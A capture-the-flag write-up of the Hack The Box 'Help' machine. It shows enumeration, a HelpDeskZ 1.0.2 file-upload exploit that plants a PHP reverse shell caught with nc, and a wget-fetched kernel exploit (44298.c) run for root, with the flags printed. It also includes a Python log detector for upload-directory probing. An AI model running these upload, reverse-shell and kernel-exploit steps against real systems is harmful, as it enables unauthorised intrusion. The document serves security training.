Hackthebox - Help
Box information
Box type
Information gathering
Nmap
┌──(root㉿lucifiel)-[~/Desktop]
└─# nmap -sS -sC -sV -A -p- --min-rate 5000 10.10.10.121
Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-01 09:14 CST
Nmap scan report for 10.10.10.121
Host is up (0.35s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e5:bb:4d:9c:de:af:6b:bf:ba:8c:22:7a:d8:d7:43:28 (RSA)
| 256 d5:b0:10:50:74:86:a3:9f:c5:53:6f:3b:4a:24:61:19 (ECDSA)
|_ 256 e2:1b:88:d3:76:21:d4:1e:38:15:4a:81:11:b7:99:07 (ED25519)
80/tcp open http Apache httpd 2.4.18
|_http-title: Did not follow redirect to http://help.htb/
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.16 (95%), Linux 3.18 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 3.10 - 4.11 (93%), DD-WRT (Linux 3.18) (93%), Linux 4.10 (93%), Linux 4.2 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 349.63 ms 10.10.14.1
2 349.25 ms 10.10.10.121
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.59 seconds
HTTP
Visiting the IP directly redirects to help.htb, so add a hosts entry:
echo 10.10.10.121 help.htb >> /etc/hosts
Now the site loads, but it is only the default Apache2 page, so let's fuzz it.
Fuzz
┌──(root㉿lucifiel)-[~/Desktop]
└─# gobuster dir -u http://help.htb/ --wordlist /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -t 200 --no-error
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://help.htb/
[+] Method: GET
[+] Threads: 200
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/09/04 20:36:06 Starting gobuster in directory enumeration mode
===============================================================
/javascript (Status: 301) [Size: 309] [--> http://help.htb/javascript/]
/support (Status: 301) [Size: 306] [--> http://help.htb/support/]
/server-status (Status: 403) [Size: 296]
===============================================================
2022/09/04 20:37:41 Finished
===============================================================
There is a /support directory; let's visit it.
It is a login page, and the framework can be identified as HelpDeskZ.
┌──(root㉿lucifiel)-[~/Desktop]
└─# searchsploit helpdeskz
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
HelpDeskZ 1.0.2 - Arbitrary File Upload | php/webapps/40300.py
HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download | php/webapps/41200.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
There are two entries: an arbitrary file upload in version 1.0.2, and an SQL injection in versions below 1.0.2. But we cannot yet confirm which version this CMS is running.
┌──(root㉿lucifiel)-[~/Desktop]
└─# curl http://help.htb/support/README.md
Version: 1.0.2 from 1st June 2015<br>
Developed by: Evolution Script S.A.C.<br>
[Help Desk Software HelpDeskZ](http://www.helpdeskz.com)
HelpDeskZ is a free PHP based software which allows you to manage your site's support with a web-based support ticket system.
## Requirements
HelpDeskZ requires:
- PHP 5.x
- MySQL database
- GD Library (only for captcha verification)
- Mod_rewrite (only if you want to use permalinks)-
## Upgrading
To upgrade your HelpDeskZ from previous versions, please read the file UPGRADING.txt
## Installation steps
- Connect with FTP to the <em>public folder</em> of your server where the rest of your Web site is
- Create a new folder where you will install HelpDeskZ. Name it anything you like, for example "helpdesk" or "support".<br>
Example: /public_html/support<br>
Corresponding URL: http://www.site.com/support
- Upload all HelpDeskZ files to your server.
- Open **/install** in your browser, for example (modify to your URL):<br />
http://www.site.com/support/install
- The HelpDeskZ setup script will run. Click <strong>INSTALL HELPDESKZ</strong> and follow the instructions through License agreement, Check Setup and Database settings.
- Before closing the install script **DELETE the "install" directory from your server!**
- Now it's time to setup your help desk! Open the <strong>staff</strong> panel in your browser, for example:<br />
http://www.site.com/support/?v=staff<br />
Use the login details that you entered in the installation process.
- Go to <strong>Settings -> General</strong> to get to the settings page.
- Take some time and get familiar with all of the available settings. Most of them should be self-explanatory.
- If you want to use permalinks like http://www.site.com/support/staff/ then you have to enable this option on Settings -> General -> Helpdesk -> Use SEO-friendly URLs
- Good luck using HelpDeskZ!
-
## Email Piping
HelpDeskZ supports email piping, this allows the auto-creation of tickets from incoming emails to a set email address.
- To enable email piping for your help desk follow this <a href="http://www.helpdeskz.com/help/knowledgebase/2/article/10/setting-up-email-piping">email piping tutorial.</a>
## Customize the look
For detailed information please see this <a href="http://www.helpdeskz.com/help/knowledgebase/2/article/6/how-do-i-customize-helpdeskz-look">knowledgebase article.</a>
## Translate HelpDeskZ to your language
To translate HelpDeskZ read <a href="http://www.helpdeskz.com/help/knowledgebase/2/article/8/how-can-i-translate-helpdeskz">How can I translate HelpDeskZ.</a>
The README.md tells us the installed version is 1.0.2.
Given the advisories, an SQL injection attempt should be possible right away, but let's first look at the other avenues.
Port 3000
There is also a service reachable on port 3000:
"Hi Shiv, To get access please find the credentials with given query"
This hints that to get access we need to find the credentials through the given query.
┌──(root㉿lucifiel)-[~/Desktop]
└─# dirsearch -u "http://10.10.10.121:3000"
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /root/.dirsearch/reports/10.10.10.121-3000/_22-07-01_09-29-39.txt
Error Log: /root/.dirsearch/logs/errors-22-07-01_09-29-39.log
Target: http://10.10.10.121:3000/
[09:29:40] Starting:
[09:33:40] 400 - 18B - /graphql/
[09:33:40] 400 - 18B - /graphql/console/
[09:33:40] 400 - 18B - /graphql
Task Completed
We found a /graphql endpoint, with a /console under it. Let's visit it.
It says a GET parameter named query is required.
Adding an arbitrary parameter does return data, but with a syntax error, so let's look at how the query functionality works.
After finding the relevant usage, a username and password could be read out.
Exploitation
Credentials after decoding:
username = helpme@helpme.com
password = godhelpmeplz
Logged in successfully on port 80.
Change the time zone to match our current environment.
In Submit a Ticket, try uploading a PHP file.
The page reports that the upload failed, but it actually succeeded; the file is simply stored under a random name. Finding that name is enough, so let's use the exploit script instead.
┌──(root㉿lucifiel)-[~/Desktop]
└─# python2 40300.py http://help.htb/support/uploads/tickets/ 1.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
found!
http://help.htb/support/uploads/tickets/9d831815c3faa6a961d01bd9dc543aca.php
Upload succeeded; let's try to access it.
The file was uploaded and is reachable, so next prepare a PHP reverse shell:
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
Upload it through the web page, start an nc listener, then run the exploit.
┌──(root㉿lucifiel)-[~/Desktop]
└─# python2 40300.py http://help.htb/support/uploads/tickets/ phpshell.php
Helpdeskz v1.0.2 - Unauthenticated shell upload exploit
┌──(root㉿lucifiel)-[~/Desktop]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.121] 35558
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
19:41:30 up 1 day, 9:53, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')";
help@help:/$ id&&whoami
id&&whoami
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
help
Got a reverse shell.
cat user.txt
64cf57c35b4e6991534e125790ad0b55
Got the user flag.
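From the defender's side, the upload step above leaves two traces in the Apache access log: a burst of 404s for candidate script names under /support/uploads/tickets/, then a 200 for a .php file served from that directory. The following detection is an added example, not part of the writeup; the log lines are constructed (the HelpDeskZ attachment path is the one seen in this writeup) and the threshold is an assumption.

```python
import re
from collections import defaultdict

# Constructed Apache combined-log sample (not from the box): a burst of guesses for
# script names under the ticket upload directory, then the one that exists.
SAMPLE_LOG = """\
10.10.14.9 - - [04/Sep/2022:20:40:01 +0000] "POST /support/?v=submit_ticket&action=submit HTTP/1.1" 200 1523
10.10.14.9 - - [04/Sep/2022:20:40:02 +0000] "GET /support/uploads/tickets/0a1b2c3d4e5f60718293a4b5c6d7e8f9.php HTTP/1.1" 404 296
10.10.14.9 - - [04/Sep/2022:20:40:02 +0000] "GET /support/uploads/tickets/1b2c3d4e5f60718293a4b5c6d7e8f90a.php HTTP/1.1" 404 296
10.10.14.9 - - [04/Sep/2022:20:40:02 +0000] "GET /support/uploads/tickets/2c3d4e5f60718293a4b5c6d7e8f90a1b.php HTTP/1.1" 404 296
10.10.14.9 - - [04/Sep/2022:20:40:03 +0000] "GET /support/uploads/tickets/9d831815c3faa6a961d01bd9dc543aca.php HTTP/1.1" 200 0
10.10.14.20 - - [04/Sep/2022:20:41:10 +0000] "GET /support/uploads/tickets/ticket-attachment.pdf HTTP/1.1" 200 4102
"""

UPLOAD_DIR = "/support/uploads/tickets/"           # HelpDeskZ attachment directory seen in the writeup
SCRIPT_EXT = (".php", ".phtml", ".phar", ".php5")  # server-side script extensions that should never be served from there
PROBE_THRESHOLD = 3                                # assumed: 404s under UPLOAD_DIR before a client counts as guessing names

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\w+) (\S+) [^"]*" (\d{3}) ')

def parse_line(line):
    """Return (client, method, path-without-query, status) or None for an unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, method, path, status = m.groups()
    return client, method, path.split("?", 1)[0], int(status)

def analyze(log_text):
    """Flag clients guessing script names under the upload dir, and any script actually served from it."""
    probes = defaultdict(int)
    alerts = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        client, method, path, status = rec
        if not path.startswith(UPLOAD_DIR) or not path.lower().endswith(SCRIPT_EXT):
            continue  # ordinary attachment traffic (e.g. a .pdf) is not interesting here
        if status == 404:
            probes[client] += 1
            if probes[client] == PROBE_THRESHOLD:
                alerts.append(("upload-dir-probe", client, path))
        elif status == 200:
            alerts.append(("script-served-from-uploads", client, path))
    return alerts

if __name__ == "__main__":
    for kind, client, path in analyze(SAMPLE_LOG):
        print(f"{kind}: {client} {path}")
```

The second alert type is the one worth acting on regardless of volume: a web server that executes scripts out of an upload directory is the root cause, and an Apache rule denying handler execution under that path removes it.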
Privilege escalation
First start an HTTP server with Python and transfer the linpeas privilege-escalation helper script to the target.
╔═══════════════════╗
═════════════════════════════════════════╣ Basic information ╠═════════════════════════════════════════
╚═══════════════════╝
OS: Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018
User & Groups: uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)
Hostname: help
Writable folder: /dev/shm
[+] /bin/ping is available for network discovery (linpeas can discover hosts, learn more with -h)
[+] /bin/nc is available for network discover & port scanning (linpeas can discover hosts and scan ports, learn more with -h)
Caching directories . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . DONE
The kernel version is 4.4.0-116; let's search for known exploits.
┌──(root㉿lucifiel)-[~/Desktop]
└─# searchsploit 4.4.0-116
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation | linux/local/44298.c
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Found one. Transfer it to the target, then compile and run it.
help@help:/tmp$ wget http://10.10.14.9/44298.c
wget http://10.10.14.9/44298.c
--2022-09-04 20:40:43-- http://10.10.14.9/44298.c
Connecting to 10.10.14.9:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5773 (5.6K) [text/x-csrc]
Saving to: '44298.c'
44298.c 100%[===================>] 5.64K --.-KB/s in 0s
2022-09-04 20:40:43 (20.3 MB/s) - '44298.c' saved [5773/5773]
Once transferred, compile it:
help@help:/tmp$ gcc 44298.c -o exploit
gcc 44298.c -o exploit
Then run it:
help@help:/tmp$ ./exploit
./exploit
task_struct = ffff880037ee8000
uidptr = ffff880036f91084
spawning root shell
root@help:/tmp# whoami&&id
whoami&&id
root
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare),1000(help)
root@help:/root# cat root.txt
cat root.txt
9123b571740b6f2c3b1a7fa657c55f20
Got the root flag.